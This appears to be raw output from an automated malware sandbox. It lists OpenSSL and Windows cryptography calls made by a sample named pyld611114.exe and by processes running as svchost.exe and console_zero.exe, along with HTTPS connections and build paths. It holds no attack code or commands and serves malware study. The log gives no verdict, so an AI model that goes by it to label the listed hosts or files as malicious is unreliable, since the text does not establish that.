Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3653C30 CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3653C30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361BC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,42_2_00007FFDA361BC10
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3601BE0 CRYPTO_zalloc,42_2_00007FFDA3601BE0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3607BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3607BEE
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361DAA0 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_new,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_memdup,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA361DAA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367BAA0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,42_2_00007FFDA367BAA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3623A70 CRYPTO_get_ex_data,42_2_00007FFDA3623A70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3613A70 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OSSL_STACK_OF_X509_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3613A70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3641A60 CRYPTO_free,42_2_00007FFDA3641A60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3627B50 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,ERR_new,ERR_set_debug,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,42_2_00007FFDA3627B50
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3679B4A memset,CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA3679B4A
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3679B33 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestVerify,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,42_2_00007FFDA3679B33
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364BB00 CRYPTO_free,42_2_00007FFDA364BB00
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36379D0 CRYPTO_malloc,memcpy,BIO_snprintf,BIO_snprintf,CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_new_file,BIO_free_all,CRYPTO_free,BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36379D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36799B3 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA36799B3
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36419A0 CRYPTO_malloc,42_2_00007FFDA36419A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367999C EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,CRYPTO_malloc,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free,42_2_00007FFDA367999C
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3679985 ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,42_2_00007FFDA3679985
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360DA50 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OSSL_STACK_OF_X509_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,42_2_00007FFDA360DA50
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365DA40 CRYPTO_memcmp,42_2_00007FFDA365DA40
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3609A20 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,42_2_00007FFDA3609A20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363B8D0 CRYPTO_free,CRYPTO_free,OSSL_ERR_STATE_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA363B8D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36378D0 BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36378D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36618D0 CRYPTO_free,42_2_00007FFDA36618D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36738C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,42_2_00007FFDA36738C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B8C0 CRYPTO_free,42_2_00007FFDA366B8C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B870 CRYPTO_free,42_2_00007FFDA366B870
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367985F memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,memcmp,memcmp,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA367985F
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3607870 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free,42_2_00007FFDA3607870
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3611950 CRYPTO_free,CRYPTO_strdup,42_2_00007FFDA3611950
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3667920 ERR_new,ERR_set_debug,CRYPTO_malloc,COMP_expand_block,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3667920
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36518E9 CRYPTO_malloc,CRYPTO_free,42_2_00007FFDA36518E9
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364FFD0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA364FFD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3635FA0 CRYPTO_realloc,42_2_00007FFDA3635FA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368BFA0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,EVP_PKEY_derive_set_peer,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,42_2_00007FFDA368BFA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3609F90 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,42_2_00007FFDA3609F90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360DF70 CRYPTO_malloc,BIO_snprintf,42_2_00007FFDA360DF70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362A030 OSSL_PROVIDER_do_all,CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,42_2_00007FFDA362A030
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3640010 CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_free,42_2_00007FFDA3640010
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3642000 CRYPTO_free,42_2_00007FFDA3642000
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360BFF0 CRYPTO_THREAD_run_once,42_2_00007FFDA360BFF0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3667FE0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_mark,ERR_clear_last_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA3667FE0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3601EC0 CRYPTO_free,42_2_00007FFDA3601EC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3657EC0 CRYPTO_zalloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA3657EC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362DEA0 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,42_2_00007FFDA362DEA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3667E90 CRYPTO_malloc,COMP_expand_block,42_2_00007FFDA3667E90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3675E80 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,memcpy,EVP_MD_get0_name,EVP_MD_is_a,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA3675E80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3641E70 CRYPTO_realloc,42_2_00007FFDA3641E70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3639E60 OPENSSL_LH_free,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,42_2_00007FFDA3639E60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3629F30 OSSL_PROVIDER_do_all,CRYPTO_malloc,memcpy,42_2_00007FFDA3629F30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3671F30 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3671F30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3623F00 CRYPTO_free,CRYPTO_strdup,42_2_00007FFDA3623F00
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367BDB0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_is_a,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,42_2_00007FFDA367BDB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3607DA0 CRYPTO_free,42_2_00007FFDA3607DA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3605DB0 CRYPTO_malloc,42_2_00007FFDA3605DB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3679DA6 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA3679DA6
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3623D70 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,42_2_00007FFDA3623D70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364BD60 CRYPTO_zalloc,42_2_00007FFDA364BD60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3623E50 CRYPTO_free,CRYPTO_memdup,42_2_00007FFDA3623E50
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3655E20 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA3655E20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360DE10 i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,42_2_00007FFDA360DE10
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3653E10 CRYPTO_malloc,CRYPTO_free,42_2_00007FFDA3653E10
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3629E00 CRYPTO_zalloc,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,42_2_00007FFDA3629E00
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366DDE0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,42_2_00007FFDA366DDE0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3629CC0 EVP_MAC_CTX_free,CRYPTO_free,42_2_00007FFDA3629CC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3679CC1 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_CTX_copy_ex,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,42_2_00007FFDA3679CC1
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363FCB0 CRYPTO_free,42_2_00007FFDA363FCB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3679CAA ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,42_2_00007FFDA3679CAA
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA366FC90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3671C70 CRYPTO_realloc,42_2_00007FFDA3671C70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3655D30 CRYPTO_free,42_2_00007FFDA3655D30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA378BA86 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,_wcsdup,CertOpenStore,GetLastError,free,free,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,calloc,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,malloc,fclose,free,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,free,42_2_00007FFDA378BA86
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA375E3C0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,42_2_00007FFDA375E3C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA376C300 BCryptGenRandom,42_2_00007FFDA376C300
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA378E270 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,42_2_00007FFDA378E270
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA375E3C0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,45_2_00007FFDA375E3C0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA376C300 BCryptGenRandom,45_2_00007FFDA376C300
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378E270 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,45_2_00007FFDA378E270
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3741180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,45_2_00007FFDA3741180
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FFDA37731A0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FFDA3773110 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FFDA3773090 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FFDA378E7A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FFDA375E570 CryptHashData
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FFDA375E580 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FFDA378B4E0 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FFDA375E4F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FFDA376C4D0 memset,BCryptGenRandom
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FFDA378BA86 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FFDA378DE50 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FFDA3774930 mov dword ptr [rbp+04h], 424D53FFh
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:49860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:49881 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.6:49886 version: TLS 1.2
Source: pyld611114.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: vcruntime140d.amd64.pdb,,, source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452174968.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002D.00000002.2564379487.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp
